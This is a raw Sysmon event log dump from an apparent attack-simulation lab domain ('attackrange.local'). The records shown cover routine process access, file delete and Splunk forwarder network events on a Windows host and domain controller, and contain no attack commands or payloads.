23542300x8000000000000000151839Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:41.337{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9996F1B94584BFAB93930AEC31EE29EE,SHA256=9B13FC2076E2B099F8DF4F6FF3ADC49E01226474E595F954818DD6581F62962D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105197Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:42.777{54715871-FD18-60C9-0D00-00000000CF01}9081336C:\Windows\system32\svchost.exe{54715871-FD18-60C9-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105196Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:39.897{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55443-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000151976Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.937{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151975Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.937{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151974Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.937{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151973Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.600{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFF573416E31D60BEBF624DC7BCEE965,SHA256=96A2AAC47FF8E7E118B9B87A01B894918A007013E97539D3C1E8A45AEB0A2D0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151972Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7149-60CA-230D-00000000D101}7044C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151971Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7149-60CA-230D-00000000D101}7044C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151970Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151969Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151968Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151967Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151966Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151965Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151964Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151963Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151962Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151961Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151960Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KE